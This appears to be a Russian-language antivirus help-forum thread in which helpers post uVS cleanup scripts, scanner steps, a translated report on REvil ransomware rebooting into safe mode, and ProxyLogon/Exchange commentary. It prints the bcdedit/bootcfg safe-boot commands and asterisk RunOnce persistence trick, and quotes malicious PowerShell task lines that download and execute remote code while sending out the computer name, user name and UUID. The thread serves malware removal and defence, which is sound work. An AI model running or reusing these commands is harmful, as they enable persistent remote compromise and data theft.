выполняем скрипт в uVS:
- скопировать содержимое кода в буфер обмена;
- стартуем uVS(start.exe), далее выбираем: текущий пользователь, меню - скрипты - выполнить скрипт из буфера обмена;
- закрываем все браузеры перед выполнением скрипта;
при деинсталляции программ - соглашаемся на деинсталляцию_удаление подтверждаем "да"
[code]

;uVS v4.11.6 [http://dsrt.dyndns.org:8888]
;Target OS: NTv10.0
v400c
OFFSGNSAVE
;------------------------autoscript---------------------------

zoo %SystemDrive%\USERS\ASUS\APPDATA\ROAMING\MICROSOFT\GOOGLE\CH­ROMEEXTENSIONS\ADS\HONEYADS\EXUPD.EXE
addsgn 0DC97ABF556A80BEC718627DA804DEC9E9EC9AF9967E1F7885C3C543B096­2404A0FBE31FB5BFD5C22AC80F4ECD1EA1CF802017E21D59740C70B4686F­924EA999 8 Trojan:Win32/Bomitag.D!ml [Microsoft] 7

chklst
delvir

delref %SystemDrive%\USERS\ASUS\APPDATA\ROAMING\MOZILLA\FIREFOX\PRO­FILES\FFDSIYFJ.DEFAULT-1572023545566\FEATURES\{4D217842-9BCE-467C-9E32-E71A4577FA46}\[email protected]
apply

deltmp
delref %Sys32%\DRIVERSTORE\FILEREPOSITORY\NVAMI.INF_AMD64_59AE0FEAB7458406\DISPLAY.NVCONTAINER\NVDISPLAY.CONTAINER.EXE -S NVDISPLAY.CONTAINERLOCALSYSTEM -F C:\PROGRAMDATA\NVIDIA\NVDISPLAY.CONTAINERLOCALSYSTEM.LOG -L 3 -D C:\WINDOWS\SYSTEM32\DRIVERSTORE\FILEREPOSITORY\NVAMI.INF_AMD64_59AE0FEAB7458406\DISPLAY.NVCONTAINER\PLUGINS\LOCALSYSTEM -R -P 30000 -CFG NVDISPLAY.CONTAINERLOCALSYSTEM\LOCALSYSTEM
delref %SystemDrive%\USERS\ASUS\APPDATA\LOCAL\TEMP\EDGE_BITS_9000_3­43374450\A04F9D18-B852-4181-97B7-6D0D8D0FDCC0
delref %SystemDrive%\USERS\ASUS\APPDATA\LOCAL\TEMP\CHROME_BITS_9952­_1545405988\AKCBQLETN1E8LQ8RYG_IHAS
delref {D27CDB6E-AE6D-11CF-96B8-444553540000}\[CLSID]
delref %SystemRoot%\SYSWOW64\BLANK.HTM
delref %Sys32%\BLANK.HTM
delref %Sys32%\DRIVERSTORE\FILEREPOSITORY\NVAMI.INF_AMD64_59AE0FEAB7458406\DISPLAY.NVCONTAINER\NVDISPLAY.CONTAINER.EXE -S NVDISPLAY.CONTAINERLOCALSYSTEM -F %PROGRAMDATA%\NVIDIA\NVDISPLAY.CONTAINERLOCALSYSTEM.LOG -L 3 -D C:\WINDOWS\SYSTEM32\DRIVERSTORE\FILEREPOSITORY\NVAMI.INF_AMD64_59AE0FEAB7458406\DISPLAY.NVCONTAINER\PLUGINS\LOCALSYSTEM -R -P 30000 -CFG NVDISPLAY.CONTAINERLOCALSYSTEM\LOCALSYSTEM
delref %Sys32%\DRIVERS\PORTTALK.SYS
delref %SystemDrive%\USERS\ASUS\APPDATA\LOCAL\MOZILLA FIREFOX\BROWSER\FEATURES\[email protected]
delref %SystemDrive%\USERS\ASUS\APPDATA\LOCAL\MOZILLA FIREFOX\BROWSER\FEATURES\[email protected]
delref %SystemDrive%\USERS\ASUS\APPDATA\LOCAL\MOZILLA FIREFOX\BROWSER\FEATURES\[email protected]
delref %SystemDrive%\USERS\ASUS\APPDATA\LOCAL\MOZILLA FIREFOX\BROWSER\FEATURES\[email protected]
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.36.52\PSMACHINE_64.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGEUPDATE\1.3.139.59\PSMACHINE_64.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGEUPDATE\1.3.139.65\PSMACHINE_64.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGEUPDATE\1.3.141.59\PSMACHINE_64.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGEUPDATE\1.3.139.71\PSMACHINE_64.DLL
delref %SystemRoot%\SYSWOW64\SPEECH_ONECORE\COMMON\SPEECHRUNTIME.EXE
delref %SystemRoot%\SYSWOW64\DRIVERSTORE\FILEREPOSITORY\NVAMI.INF_AMD64_59AE0FEAB7458406\NVENCMFTH264.DLL
delref %SystemRoot%\SYSWOW64\DRIVERSTORE\FILEREPOSITORY\NVAMI.INF_AMD64_59AE0FEAB7458406\NVDECMFTMJPEG.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.36.52\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGEUPDATE\1.3.139.59\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGEUPDATE\1.3.139.65\PSMACHINE.DLL
delref %SystemRoot%\SYSWOW64\DRIVERSTORE\FILEREPOSITORY\NVAMI.INF_AMD64_59AE0FEAB7458406\NVENCMFTHEVC.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGEUPDATE\1.3.141.59\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGEUPDATE\1.3.139.71\PSMACHINE.DLL
;-------------------------------------------------------------

restart
[/code]
перезагрузка, пишем о старых и новых проблемах.
------------
далее,
сделайте дополнительно быструю проверку системы в малваребайт
http://forum.esetnod32.ru/forum9/topic10688/

приложите образ автозапуска к вашему сообщению, раз есть такая возможность

[B]REvil добавил новую возможность шифрования файлов в безопасном режиме Windows, что позволяет избежать обнаружения программным обеспечением безопасности и добиться большего успеха при шифровании файлов.
[/B]
Безопасный режим Windows - это специальный режим запуска, который позволяет пользователям запускать административные и диагностические задачи в операционной системе. В этом режиме загружается только самый минимум программного обеспечения и драйверов, необходимых для работы операционной системы.

Более того, любые установленные в Windows программы, которые настроены на автоматический запуск, не будут запускаться в безопасном режиме, если их автозапуск не настроен определенным образом.

Один из способов создать автозапуск в Windows - создать записи в следующих разделах реестра:

   [QUOTE]HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
   HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\­Run
   HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion­\RunOnce
   HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\­RunOnce[/QUOTE]

Ключи «Run» запускают программу каждый раз, когда вы входите в систему, а ключи «RunOnce» запускает программу только один раз, а затем удаляет запись из реестра.

Например, следующий ключ реестра автоматически запустит программу C:\Users\test\test.exe при входе в Windows.

 [QUOTE] [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
   "Startup"="C:\Users\test\test.exe"[/QUOTE]


Однако указанный выше автозапуск не запустится в безопасном режиме, если вы не добавите звездочку (*) в начало имени значения, как показано ниже:

[QUOTE] [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
   "* Startup" = "C:\Users\test\test.exe"[/QUOTE]

REvil теперь включает режим 'Safe Mode'

В новом образце вымогателя REvil, обнаруженном MalwareHunterTeam, был добавлен новый аргумент командной строки -smode, который заставляет компьютер перезагружаться в безопасном режиме перед шифрованием устройства.

Для этого REvil выполнит следующие команды, чтобы компьютер загрузился в безопасном режиме с загрузкой сетевых драйверов при следующей перезагрузке Windows.

 [QUOTE] bootcfg /raw /a /safeboot:network /id 1
   bcdedit /set {current} safeboot network[/QUOTE]


Затем он создает автозапуск «RunOnce» под названием «* franceisshit», который выполняет «bcdedit / deletevalue {current} safeboot» после того, как пользователь войдет в безопасный режим.

Наконец, программа-вымогатель выполняет принудительный перезапуск Windows, который не может быть прерван пользователем.

Непосредственно перед завершением процесса он создаст дополнительный автозапуск RunOnce под названием «AstraZeneca», возможно, в связи с недавними обсуждениями во Франции использования вакцины.

Этот автозапуск перезапустит программу-вымогатель REvil без аргумента -smode, когда следующий пользователь войдет в систему после перезагрузки устройства.

Важно помнить, что обе эти записи RunOnce будут выполнены после входа в безопасный режим и будут автоматически удалены Windows.

После перезагрузки устройство запустится в безопасном режиме с загрузкой сетевых драйверов, и пользователю будет предложено войти в Windows. После входа в систему программа-вымогатель REvil будет запущена без аргумента -smode, чтобы начать шифрование файлов на устройстве.

Windows также запустит команду «bcdedit / deletevalue {current} safeboot», настроенную ключом реестра «* AstraZeneca», чтобы компьютер мог перезагрузиться в нормальный режим после завершения работы программы-вымогателя.

Пока REvil шифрует файлы, экран безопасного режима будет пустым, но по-прежнему можно использовать Ctrl + Alt + Delete для запуска диспетчера задач Windows. Оттуда вы можете увидеть запущенный исполняемый файл, который в нашем тесте называется «smode.exe», как показано ниже.

Во время работы программа-вымогатель не позволяет пользователям запускать какие-либо программы через диспетчер задач, пока не завершит шифрование устройства.

После того, как устройство будет зашифровано, будет продолжена остальная часть последовательности загрузки, а рабочий стол будет показан с запиской о выкупе и зашифрованными файлами.

Необычный подход

Новая операция REvil в безопасном режиме немного странная, поскольку требует от пользователей входа в систему после перезапуска в безопасном режиме.

Кроме того, как только они войдут в безопасный режим, они будут представлены с пустым экраном и загрузкой дисков, поскольку программа-вымогатель шифрует устройство.

Такое поведение может привести к тому, что пользователи могут перейти в спящий режим или выключат свои компьютеры в целях безопасности.

По этой причине возможно, что злоумышленники вручную запускают новую команду безопасного режима на определенных компьютерах, таких как виртуальные машины или серверы, которые они хотят зашифровать без проблем.

[B]Независимо от причин, это еще один новый метод атаки, на который следует обратить внимание специалистам по безопасности и администраторам Windows, поскольку группы вымогателей постоянно меняют свою тактику.
[/B]
REvil - не единственная операция, использующая безопасный режим для шифрования устройств.

В 2019 году еще одна программа-вымогатель, известная как Snatch, также добавила возможность шифровать устройство в безопасном режиме с помощью службы Windows.

https://www.bleepingcomputer.com/news/security/revil-ransomware-has-a-new-windows-safe-mode-encryption-mode/

да, все найденное в малваребайт удалить,
далее

3.сделайте проверку в АдвКлинере
http://forum.esetnod32.ru/forum9/topic7084/

*****
4.в АдвКлинере, после завершения проверки,
в секции [b]Папки[/b] снимите галки с записей mail.ru, yandex (если есть такие)
остальное удалите по кнопке [b]Очистить[/b]
далее,

5.сделайте проверку в FRST
http://forum.esetnod32.ru/forum9/topic2798/

выполняем скрипт в uVS:
- скопировать содержимое кода в буфер обмена;
- стартуем uVS(start.exe), далее выбираем: текущий пользователь, меню - скрипты - выполнить скрипт из буфера обмена;
- закрываем все браузеры перед выполнением скрипта;
при деинсталляции программ - соглашаемся на деинсталляцию_удаление подтверждаем "да"
[code]

;uVS v4.11.6 [http://dsrt.dyndns.org:8888]
;Target OS: NTv6.1
v400c
OFFSGNSAVE
hide %Sys32%\RPCSS.DLL
;------------------------autoscript---------------------------

del %SystemDrive%\USERS\ОЛЕГ\APPDATA\ROAMING\MICROSOFT\WINDOWS\S­TART MENU\PROGRAMS\STARTUP\MICROSOFT NET_FRAMEWORK.BAT
zoo %SystemDrive%\USERS\ОЛЕГ\APPDATA\ROAMING\MICROSOFT\GOOGLE\CH­ROMEEXTENSIONS\ADS\HONEYADS\EXUPD.EXE
addsgn 0DC97ABF556A80BEC718627DA804DEC9E9EC9AF9967E1F7885C3C543B096­2404A0FBE31FB5BFD5C22AC80F4ECD1EA1CF802017E21D59740C70B4686F­924EA999 8 Trojan:Win32/Bomitag.D!ml [Microsoft] 7

chklst
delvir

delref HTTP://CAT.WARGAMING.NET
delref %SystemDrive%\USERS\ОЛЕГ\APPDATA\ROAMING\MICROSOFT\WINDOWS\S­TART MENU\PROGRAMS\STARTUP\MICROSOFT NET_FRAMEWORK.BAT
apply

; OpenAL
exec  C:\Program Files (x86)\OpenAL\OpenAL.exe" /U

deltmp
delref {D27CDB6E-AE6D-11CF-96B8-444553540000}\[CLSID]
delref %SystemRoot%\SYSWOW64\BLANK.HTM
delref %Sys32%\BLANK.HTM
delref %Sys32%\PSXSS.EXE
delref %SystemDrive%\PROGRAM FILES (X86)\MOZILLA FIREFOX\BROWSER\FEATURES\[email protected]
delref %SystemDrive%\PROGRAM FILES (X86)\MOZILLA FIREFOX\BROWSER\FEATURES\[email protected]
delref %SystemDrive%\PROGRAM FILES (X86)\MOZILLA FIREFOX\BROWSER\FEATURES\[email protected]
delref %SystemDrive%\PROGRAM FILES (X86)\MOZILLA FIREFOX\BROWSER\EXTENSIONS\{972CE4C6-7E08-4474-A285-3208198CE6FD}.XPI
;-------------------------------------------------------------

restart
[/code]
перезагрузка, пишем о старых и новых проблемах.
------------
далее,
сделайте дополнительно быструю проверку системы в малваребайт
http://forum.esetnod32.ru/forum9/topic10688/

судя по логам журнала, последние события у вас наблюдались
[QUOTE][B]24.12.2020[/B] 15:32:39;Расширенный модуль сканирования памяти;файл;Оперативная память = rundll32.exe(3540);модифицированный MSIL/CoinMiner.BGJ троянская программа;содержит зараженные файлы (после следующего перезапуска);;;7BECE19F11BEFBC204657F295AC32F39075DB34A;
24.12.2020 15:34:04;Модуль сканирования файлов, исполняемых при запуске системы;файл;Оперативная память = rundll32.exe(3540);модифицированный MSIL/CoinMiner.BGJ троянская программа;содержит зараженные файлы (после следующего перезапуска);;;7BECE19F11BEFBC204657F295AC32F39075DB34A;
24.12.2020 15:39:08;Расширенный модуль сканирования памяти;файл;Оперативная память = rundll32.exe(4812);модифицированный MSIL/CoinMiner.BGJ троянская программа;содержит зараженные файлы (после следующего перезапуска);;;7BECE19F11BEFBC204657F295AC32F39075DB34A;[/QUOTE]

угу, вижу:
23.03.2021 15:37:51;Расширенный модуль сканирования памяти;файл;Оперативная память = exUpd.exe(2204);модифицированный MSIL/Injector.VGR троянская программа;содержит зараженные файлы;;;9BCE67EAE49F031BC560EC58694290353F55F8AF;

[QUOTE]RP55 RP55 написал:
Наверное одно из первых применений: regt 39

[URL=https://www.cyberforum.ru/viruses/thread2798382.html]https://www.cyberforum.ru/viruses/thread2798382.html[/URL] [/QUOTE]

первое применение отслеживания процессов здесь:
https://www.cyberforum.ru/post15308023.html
пока еще вместо regt39 - диалог для применения настроек отслеживания в gpedit (который оперативно добавил Sandor) ,
и экспорт журнала для анализа событий через скрипт Vvvyg
только после этого был создан твик 39, и автоматический анализ событий через uVS

название тем может быть примерно таким:

1. Процесс find.exe грузит процессор на ?%
2. TCP/IP services application нагружает ЦП на ?%
3. Процесс find.exe ест много памяти  и .т.п
4. Помогите удалить Trojan.Win64.Miner.gen и т.п
5. путь С:\ProgramData\Flock\Flock.exe

[B]Устранение уязвимостей Microsoft Exchange Server [/B]

[QUOTE]Партнеры по кибербезопасности и безопасности инфраструктуры (CISA) наблюдали активное использование уязвимостей в продуктах Microsoft Exchange Server. Успешное использование этих уязвимостей позволяет злоумышленнику, не прошедшему проверку подлинности, выполнить произвольный код на уязвимых серверах Exchange Server, что позволяет злоумышленнику получить постоянный доступ к системе, а также доступ к файлам и почтовым ящикам на сервере и учетным данным, хранящимся в этой системе. Успешная эксплуатация может дополнительно позволить злоумышленнику нарушить доверие и идентификацию в уязвимой сети. Microsoft выпустила внеполосные патчи для устранения уязвимостей в Microsoft Exchange Server. Уязвимости влияют на локальные серверы Microsoft Exchange и, как известно, не влияют на облачные почтовые службы Exchange Online или Microsoft 365 (ранее O365).

Это предупреждение включает в себя как тактику, методы и процедуры (TTP), так и индикаторы компрометации (IOC), связанные с этой злонамеренной деятельностью. Чтобы обезопасить себя от этой угрозы, CISA рекомендует организациям проверять свои системы на предмет наличия TTP и использовать IOC для обнаружения любых вредоносных действий. Если организация обнаруживает действия по эксплуатации, она должна предположить компрометацию сетевой идентичности и следовать процедурам реагирования на инциденты. Если организация не обнаруживает активности, она должна немедленно применить доступные исправления и реализовать меры по снижению риска, указанные в этом предупреждении.
[/QUOTE]
подробнее здесь:
https://us-cert.cisa.gov/ncas/alerts/aa21-062a

задачи, которые были запущены через powershell(Имя компьютера: SPHVMAIL01), проверьте так же наличие новых учетных записей в домене.

[QUOTE]Полное имя C:\WINDOWS\SYSTEM32\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE
Имя файла                   POWERSHELL.EXE

Цифр. подпись               Действительна, подписано Microsoft Windows
                           
Оригинальное имя            PowerShell.EXE.MUI
Версия файла                6.3.9600.17396 (winblue_r4.141007-2030)
Описание                    Windows PowerShell
Производитель               Microsoft Corporation
                           
Доп. информация             на момент обновления списка
CmdLine                     -W HIDDEN -C I`EX ([SYSTEM.TEXT.ENCODING]::ASCII.GETSTRING((NEW-OBJECT NET.WEBCLIENT).DOWNLOADDATA('HTTP://'+'T.NET'+'CATKIT.COM/A.JSP?_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT WIN32_COMPUTERSYSTEMPRODUCT).UUID,(RANDOM))-JOIN'*'))))
CmdLine                     -C (NEW-OBJECT NET.WEBCLIENT).DOWNLOADSTRING('HTTP://'+'T.NET'+'CATKIT.COM/A.JSP?REP_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT WIN32_COMPUTERSYSTEMPRODUCT).UUID,(RANDOM))-JOIN'*'))
CmdLine                     -C (NEW-OBJECT NET.WEBCLIENT).DOWNLOADSTRING('HTTP://'+'T.NET'+'CATKIT.COM/A.JSP?REP_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT WIN32_COMPUTERSYSTEMPRODUCT).UUID,(RANDOM))-JOIN'*'))
CmdLine                     -W HIDDEN -C I`EX ([SYSTEM.TEXT.ENCODING]::ASCII.GETSTRING((NEW-OBJECT NET.WEBCLIENT).DOWNLOADDATA('HTTP://'+'T.SQL'+'NETCAT.COM/A.JSP?_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT WIN32_COMPUTERSYSTEMPRODUCT).UUID,(RANDOM))-JOIN'*'))))
CmdLine                     -C (NEW-OBJECT NET.WEBCLIENT).DOWNLOADSTRING('HTTP://'+'T.NET'+'CATKIT.COM/A.JSP?REP_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT WIN32_COMPUTERSYSTEMPRODUCT).UUID,(RANDOM))-JOIN'*'))
CmdLine                     -W HIDDEN -C I`EX ([SYSTEM.TEXT.ENCODING]::ASCII.GETSTRING((NEW-OBJECT NET.WEBCLIENT).DOWNLOADDATA('HTTP://'+'DOWN.'+'SQLNETCAT.COM/A.JSP?_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT WIN32_COMPUTERSYSTEMPRODUCT).UUID,(RANDOM))-JOIN'*'))))
SHA1                        9F1E24917EF96BBB339F4E2A226ACAFD1009F47B
MD5                         C031E215B8B08C752BF362F6D4C5D3AD
                           
Ссылки на объект            
Ссылка                      C:\WINDOWS\SYSTEM32\TASKS\A5TORJ3ZT
                           
Ссылка                      C:\WINDOWS\SYSTEM32\TASKS\AVCZOHW
                           
Ссылка                      C:\WINDOWS\SYSTEM32\TASKS\JCA9PD
                           
Ссылка                      C:\WINDOWS\SYSTEM32\TASKS\Microsoft\Windows\eUuwdKQkPqT\SMYVSZ­Y4OWX
                           
Ссылка                      C:\WINDOWS\SYSTEM32\TASKS\O6YM9I
                           
Ссылка                      C:\WINDOWS\SYSTEM32\TASKS\Xnqm40cRo\ZUPKUTWN
[/QUOTE]

[QUOTE]santy написал:
[QUOTE] Владимир Шариков написал:
Что этот код делает? Стоит ли боятся "Последствий" этой бяки?[/QUOTE]
я думаю стоит.  эксплойт для ProxyLogon, по словам исследователей, мог использоваться в теч двух месяцев, до выхода мартовского обновления от Microsoft. (Возможно, была утечка эксплойта через поставщиков ПО, которые имеют ранний доступ к полученным сообщениям от исследователей)
[QUOTE]После выхода официальных исправлений даже для неподдерживаемых версий уязвимые серверы Microsoft Exchange, напрямую открытые в Интернете, стали еще более горячей целью, поскольку злоумышленники могли перепроектировать обновления для создания эксплойта.

ESET видела, что более 10 групп APT бросились атаковать непропатченные устройства. Многие из них занимались кибершпионажем, и в этот список входят Mikroceen и Tonto Team, но не все.

Исследователи заметили активность группы, которую они называют «Opera» Cobalt Strike, которая использовала уязвимости Microsoft Exchange для установки продукта для тестирования на проникновение Cobalt Strike, который является обычным для некоторых известных кибергрупп Ransomware.

В другом случае ESET заметил, что злоумышленник сбрасывает веб-оболочки, чтобы «установить так называемые бэкдоры IIS». Активность, приписываемая ботнету DLTMiner [1, 2], занимающемуся майнингом криптовалют, была замечена на серверах, которые были атакованы с помощью уязвимостей ProxyLogon.[/QUOTE]

[QUOTE]Вице-президент Mandiant по анализу, Джон Халтквист, ожидает, что в ближайшее время банды вымогателей будут еще больше использовать уязвимости ProxyLogon, которые могут найти вектор атаки «особенно привлекательным», поскольку он является «эффективным средством получения доступа администратора домена».

«Этот доступ позволяет им развертывать шифрование на предприятии. В случаях, когда организации не исправлены, эти уязвимости предоставят преступникам более быстрый путь к успеху », - Джон Халтквист.[/QUOTE]

более подробно, здесь
[URL=https://www.bleepingcomputer.com/news/security/the-microsoft-exchange-hacks-how-they-started-and-where-we-are/]https://www.bleepingcomputer.com/news/security/the-microsoft-exchange-hacks-how-they-started-and-where-we-are/[/URL]